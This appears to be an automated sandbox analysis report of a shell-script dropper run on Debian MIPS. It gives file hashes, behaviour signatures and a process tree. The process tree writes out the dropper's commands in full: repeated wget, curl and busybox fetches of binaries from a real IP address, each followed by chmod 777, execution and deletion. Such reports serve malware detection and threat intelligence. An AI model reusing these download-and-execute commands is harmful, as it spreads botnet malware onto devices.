Analysis
-
max time kernel
151s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 02:00
Static task
static1
Behavioral task
behavioral1
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
-
Size
10KB
-
MD5
f542050a645c72e971d62a3493d03ae4
-
SHA1
9517efa75044c18478c68a6d42b01b42a2af2329
-
SHA256
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c
-
SHA512
2934d0671bff24eb6ed85dc500e0d6b40470feb320ea6561cda2cb0e9aca88122ba2739e65472e29c40a565454c1182288cf4f4feb19d9143e1ecd3daab76a26
-
SSDEEP
96:VVRM3rrZCbd1HK0VBiVtx2VNzk4atFzbUeVRM3rrlXkbd1/f3s1O5VBiVtn:0Cbd1q0VBiVtx2VNGjd1jVBiVtn
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 820 chmod 843 chmod 916 chmod 826 chmod 861 chmod 886 chmod 898 chmod 892 chmod 910 chmod 923 chmod 751 chmod 813 chmod 874 chmod 880 chmod 904 chmod 737 chmod 745 chmod 764 chmod 786 chmod -
Executes dropped EXE 19 IoCs
ioc pid Process /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe 738 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 746 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP 752 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX 766 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe 788 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf 814 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 821 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE 827 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq 844 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC 862 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH 875 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l 881 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 887 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP 893 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC 899 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH 905 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l 911 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 917 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP 924 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE curl File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH curl File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l curl File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH curl File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 curl File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP curl File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe curl File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC curl File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe curl File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX curl File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 curl File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 curl File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP curl File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 curl File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP curl File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l curl File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf curl File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq curl File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC curl
Processes
-
/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:734
-
-
/bin/chmodchmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:739
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:741
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:744
-
-
/bin/chmodchmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:750
-
-
/bin/chmodchmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:761
-
-
/bin/chmodchmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:768
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:783
-
-
/bin/chmodchmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:809
-
-
/bin/chmodchmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:819
-
-
/bin/chmodchmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:825
-
-
/bin/chmodchmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:839
-
-
/bin/chmodchmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:847
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:849
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:858
-
-
/bin/chmodchmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:873
-
-
/bin/chmodchmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:879
-
-
/bin/chmodchmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:885
-
-
/bin/chmodchmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:891
-
-
/bin/chmodchmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:897
-
-
/bin/chmodchmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:903
-
-
/bin/chmodchmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:909
-
-
/bin/chmodchmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:915
-
-
/bin/chmodchmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:922
-
-
/bin/chmodchmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Reads runtime system information
PID:927
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97